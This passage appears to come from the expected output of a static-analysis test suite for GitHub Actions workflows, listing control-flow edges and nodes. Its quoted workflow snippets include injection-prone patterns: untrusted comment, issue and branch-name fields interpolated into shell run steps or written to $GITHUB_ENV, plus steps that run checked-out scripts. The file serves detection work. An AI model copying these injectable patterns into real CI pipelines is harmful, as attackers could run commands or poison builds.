.github/workflows/poisonable_steps.yml:42:14:46:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:42:14:46:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:42:14:46:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/poisonable_steps.yml:42:9:46:111 | Run Step | +| .github/workflows/poisonable_steps.yml:44:32:44:50 | env.sot_repo | .github/workflows/poisonable_steps.yml:42:14:46:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | +| .github/workflows/shell.yml:1:5:1:8 | push | .github/workflows/shell.yml:1:1:22:32 | on: push | +| .github/workflows/shell.yml:1:5:1:8 | push | .github/workflows/shell.yml:1:1:22:32 | on: push | +| .github/workflows/shell.yml:1:5:1:8 | push | .github/workflows/shell.yml:1:5:1:8 | push | +| .github/workflows/shell.yml:1:5:1:8 | push | .github/workflows/shell.yml:1:5:1:8 | push | +| .github/workflows/shell.yml:1:5:1:8 | push | .github/workflows/shell.yml:1:5:1:8 | push | +| .github/workflows/shell.yml:5:5:9:2 | Job: job1 | .github/workflows/shell.yml:1:1:22:32 | on: push | +| .github/workflows/shell.yml:5:14:5:26 | ubuntu-latest | .github/workflows/shell.yml:1:1:22:32 | on: push | +| .github/workflows/shell.yml:5:14:5:26 | ubuntu-latest | .github/workflows/shell.yml:5:5:9:2 | Job: job1 | +| .github/workflows/shell.yml:7:9:9:2 | Run Step | .github/workflows/shell.yml:5:5:9:2 | Job: job1 | +| .github/workflows/shell.yml:7:16:7:19 | pwsh | .github/workflows/shell.yml:1:1:22:32 | on: push | +| .github/workflows/shell.yml:7:16:7:19 | pwsh | .github/workflows/shell.yml:5:5:9:2 | Job: job1 | +| .github/workflows/shell.yml:7:16:7:19 | pwsh | .github/workflows/shell.yml:7:9:9:2 | Run Step | +| .github/workflows/shell.yml:8:14:8:31 | Write-Output "foo" | .github/workflows/shell.yml:1:1:22:32 | on: push | +| .github/workflows/shell.yml:8:14:8:31 | Write-Output "foo" | .github/workflows/shell.yml:5:5:9:2 | Job: job1 | +| .github/workflows/shell.yml:8:14:8:31 | Write-Output "foo" | .github/workflows/shell.yml:7:9:9:2 | Run Step | +| .github/workflows/shell.yml:10:5:14:2 | Job: job2 | .github/workflows/shell.yml:1:1:22:32 | on: push | +| .github/workflows/shell.yml:10:14:10:26 | ubuntu-latest | .github/workflows/shell.yml:1:1:22:32 | on: push | +| .github/workflows/shell.yml:10:14:10:26 | ubuntu-latest | .github/workflows/shell.yml:10:5:14:2 | Job: job2 | +| .github/workflows/shell.yml:12:9:14:2 | Run Step | .github/workflows/shell.yml:10:5:14:2 | Job: job2 | +| .github/workflows/shell.yml:12:14:12:23 | echo "foo" | .github/workflows/shell.yml:1:1:22:32 | on: push | +| .github/workflows/shell.yml:12:14:12:23 | echo "foo" | .github/workflows/shell.yml:10:5:14:2 | Job: job2 | +| .github/workflows/shell.yml:12:14:12:23 | echo "foo" | .github/workflows/shell.yml:12:9:14:2 | Run Step | +| .github/workflows/shell.yml:15:5:19:2 | Job: job3 | .github/workflows/shell.yml:1:1:22:32 | on: push | +| .github/workflows/shell.yml:15:14:15:27 | windows-latest | .github/workflows/shell.yml:1:1:22:32 | on: push | +| .github/workflows/shell.yml:15:14:15:27 | windows-latest | .github/workflows/shell.yml:15:5:19:2 | Job: job3 | +| .github/workflows/shell.yml:17:9:19:2 | Run Step | .github/workflows/shell.yml:15:5:19:2 | Job: job3 | +| .github/workflows/shell.yml:17:16:17:19 | bash | .github/workflows/shell.yml:1:1:22:32 | on: push | +| .github/workflows/shell.yml:17:16:17:19 | bash | .github/workflows/shell.yml:15:5:19:2 | Job: job3 | +| .github/workflows/shell.yml:17:16:17:19 | bash | .github/workflows/shell.yml:17:9:19:2 | Run Step | +| .github/workflows/shell.yml:18:14:18:23 | echo "foo" | .github/workflows/shell.yml:1:1:22:32 | on: push | +| .github/workflows/shell.yml:18:14:18:23 | echo "foo" | .github/workflows/shell.yml:15:5:19:2 | Job: job3 | +| .github/workflows/shell.yml:18:14:18:23 | echo "foo" | .github/workflows/shell.yml:17:9:19:2 | Run Step | +| .github/workflows/shell.yml:20:5:22:32 | Job: job4 | .github/workflows/shell.yml:1:1:22:32 | on: push | +| .github/workflows/shell.yml:20:14:20:27 | windows-latest | .github/workflows/shell.yml:1:1:22:32 | on: push | +| .github/workflows/shell.yml:20:14:20:27 | windows-latest | .github/workflows/shell.yml:20:5:22:32 | Job: job4 | +| .github/workflows/shell.yml:22:9:22:32 | Run Step | .github/workflows/shell.yml:20:5:22:32 | Job: job4 | +| .github/workflows/shell.yml:22:14:22:31 | Write-Output "foo" | .github/workflows/shell.yml:1:1:22:32 | on: push | +| .github/workflows/shell.yml:22:14:22:31 | Write-Output "foo" | .github/workflows/shell.yml:20:5:22:32 | Job: job4 | +| .github/workflows/shell.yml:22:14:22:31 | Write-Output "foo" | .github/workflows/shell.yml:22:9:22:32 | Run Step | +| .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:5:1:8 | push | +| .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:5:1:8 | push | +| .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:5:1:8 | push | +| .github/workflows/test.yml:5:5:31:2 | Job: job1 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:5:14:5:26 | ubuntu-latest | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:5:14:5:26 | ubuntu-latest | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:8:7:10:4 | Job outputs node | +| .github/workflows/test.yml:8:19:8:49 | ${{ steps.step.outputs.value }} | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:8:19:8:49 | ${{ steps.step.outputs.value }} | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:8:19:8:49 | ${{ steps.step.outputs.value }} | .github/workflows/test.yml:8:7:10:4 | Job outputs node | +| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | .github/workflows/test.yml:8:19:8:49 | ${{ steps.step.outputs.value }} | +| .github/workflows/test.yml:11:9:15:6 | Uses Step | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:11:15:11:33 | actions/checkout@v4 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:11:15:11:33 | actions/checkout@v4 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:11:15:11:33 | actions/checkout@v4 | .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:13:24:13:24 | 0 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:13:24:13:24 | 0 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:13:24:13:24 | 0 | .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:15:15:15:31 | Get changed files | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:15:15:15:31 | Get changed files | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:15:15:15:31 | Get changed files | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:16:13:16:18 | source | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:16:13:16:18 | source | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:16:13:16:18 | source | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:17:15:17:42 | tj-actions/changed-files@v40 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:17:15:17:42 | tj-actions/changed-files@v40 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:17:15:17:42 | tj-actions/changed-files@v40 | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:19:15:19:43 | Remove foo from changed files | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:19:15:19:43 | Remove foo from changed files | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:19:15:19:43 | Remove foo from changed files | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:20:13:20:16 | step | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:20:13:20:16 | step | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:20:13:20:16 | step | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:21:15:21:55 | mad9000/actions-find-and-replace-string@3 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:21:15:21:55 | mad9000/actions-find-and-replace-string@3 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:21:15:21:55 | mad9000/actions-find-and-replace-string@3 | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:23:19:23:63 | ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:23:19:23:63 | ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:23:19:23:63 | ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:23:19:23:63 | ${{ steps.source.outputs.all_changed_files }} | +| .github/workflows/test.yml:24:17:24:21 | foo | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:24:17:24:21 | foo | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:24:17:24:21 | foo | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:25:20:25:21 | | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:25:20:25:21 | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:25:20:25:21 | | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:26:13:26:23 | simplesink1 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:26:13:26:23 | simplesink1 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:26:13:26:23 | simplesink1 | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | +| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | +| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:28:13:28:23 | simplesink2 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:28:13:28:23 | simplesink2 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:28:13:28:23 | simplesink2 | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | +| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | +| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/test.yml:32:5:40:53 | Job: job2 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:32:14:32:26 | ubuntu-latest | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:32:14:32:26 | ubuntu-latest | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | +| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | +| .github/workflows/test.yml:34:10:34:24 | always() | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | +| .github/workflows/test.yml:34:11:34:25 | always() | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | +| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:36:12:36:15 | job1 | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:39:13:39:16 | sink | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:39:13:39:16 | sink | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:39:13:39:16 | sink | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | +| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | +| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | +cfgNodes +| .github/workflows/commands.yml:1:1:39:30 | enter on: push | +| .github/workflows/commands.yml:1:1:39:30 | exit on: push | +| .github/workflows/commands.yml:1:1:39:30 | exit on: push (normal) | +| .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:15:9:18:6 | Run Step | +| .github/workflows/commands.yml:16:14:17:30 | command1 ; command2\n | +| .github/workflows/commands.yml:18:9:20:6 | Run Step | +| .github/workflows/commands.yml:18:14:19:30 | command3 \| command4\n | +| .github/workflows/commands.yml:20:9:22:6 | Run Step | +| .github/workflows/commands.yml:20:14:21:33 | command5 "$(command6)"\n | +| .github/workflows/commands.yml:22:9:24:6 | Run Step | +| .github/workflows/commands.yml:22:14:23:31 | command7 && command8\n | +| .github/workflows/commands.yml:24:9:26:6 | Run Step | +| .github/workflows/commands.yml:24:14:25:32 | command9 \|\| command10\n | +| .github/workflows/commands.yml:26:9:28:6 | Run Step | +| .github/workflows/commands.yml:26:14:27:34 | command11 "`command12`"\n | +| .github/workflows/commands.yml:28:9:31:2 | Run Step | +| .github/workflows/commands.yml:28:14:29:50 | command13 "`command14` $(date \| wc -l)"\n | +| .github/workflows/commands.yml:32:5:39:30 | Job: local_commands2 | +| .github/workflows/commands.yml:34:9:37:6 | Run Step | +| .github/workflows/commands.yml:35:14:36:30 | command1 ; command2\n | +| .github/workflows/commands.yml:37:9:39:30 | Run Step | +| .github/workflows/commands.yml:38:14:39:30 | command3 \| command4\n | +| .github/workflows/expression_nodes.yml:1:1:21:47 | enter on: issue_comment | +| .github/workflows/expression_nodes.yml:1:1:21:47 | exit on: issue_comment | +| .github/workflows/expression_nodes.yml:1:1:21:47 | exit on: issue_comment (normal) | +| .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | +| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | +| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | +| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | +| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | +| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | +| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | +| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | +| .github/workflows/multiline2.yml:1:1:89:35 | enter on: | +| .github/workflows/multiline2.yml:1:1:89:35 | exit on: | +| .github/workflows/multiline2.yml:1:1:89:35 | exit on: (normal) | +| .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:11:9:15:6 | Run Step | +| .github/workflows/multiline2.yml:11:14:14:54 | echo "changelog< event.json\n ${{ toJson(github.event) }}\nEOF\n | +| .github/workflows/multiline2.yml:32:13:32:39 | toJson(github.event) | +| .github/workflows/multiline2.yml:34:9:40:6 | Run Step | +| .github/workflows/multiline2.yml:35:14:39:14 | cat \| tee -a $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | +| .github/workflows/multiline2.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | +| .github/workflows/multiline2.yml:47:14:51:14 | cat << EOL \| tee -a $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | +| .github/workflows/multiline2.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | +| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | +| .github/workflows/multiline2.yml:59:14:62:14 | cat <<-EOF \| tee -a "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | +| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | +| .github/workflows/multiline2.yml:64:14:65:142 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') \| tee -a $GITHUB_ENV\n | +| .github/workflows/multiline2.yml:66:9:71:6 | Run Step | +| .github/workflows/multiline2.yml:67:14:70:42 | echo "PR_TITLE<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | +| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | +| .github/workflows/multiline.yml:20:9:24:6 | Run Step | +| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | +| .github/workflows/multiline.yml:24:9:30:6 | Run Step | +| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/multiline.yml:30:9:34:6 | Run Step | +| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | +| .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | +| .github/workflows/multiline.yml:34:9:40:6 | Run Step | +| .github/workflows/multiline.yml:35:14:39:14 | cat >> $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline.yml:40:9:46:6 | Run Step | +| .github/workflows/multiline.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline.yml:46:9:52:6 | Run Step | +| .github/workflows/multiline.yml:47:14:51:14 | cat << EOL >> $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline.yml:52:9:58:6 | Run Step | +| .github/workflows/multiline.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | +| .github/workflows/multiline.yml:58:9:63:6 | Run Step | +| .github/workflows/multiline.yml:59:14:62:14 | cat <<-EOF >> "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | +| .github/workflows/multiline.yml:63:9:66:6 | Run Step | +| .github/workflows/multiline.yml:64:14:65:136 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') >> $GITHUB_ENV\n | +| .github/workflows/multiline.yml:66:9:71:6 | Run Step | +| .github/workflows/multiline.yml:67:14:70:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | +| .github/workflows/multiline.yml:71:9:78:6 | Run Step | +| .github/workflows/multiline.yml:72:14:77:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/multiline.yml:78:9:85:6 | Run Step | +| .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/multiline.yml:85:9:89:29 | Run Step | +| .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/poisonable_steps.yml:1:1:46:111 | enter on: push | +| .github/workflows/poisonable_steps.yml:1:1:46:111 | exit on: push | +| .github/workflows/poisonable_steps.yml:1:1:46:111 | exit on: push (normal) | +| .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | +| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | +| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | +| .github/workflows/poisonable_steps.yml:11:53:11:75 | github.workspace | +| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | +| .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | +| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | +| .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | +| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | +| .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | +| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | +| .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | +| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | +| .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | +| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | +| .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | +| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | +| .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | +| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | +| .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | +| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | +| .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | +| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | +| .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | +| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | +| .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | +| .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | +| .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | +| .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | +| .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | +| .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | +| .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | +| .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | +| .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | +| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | +| .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | +| .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | +| .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | +| .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | +| .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | +| .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | +| 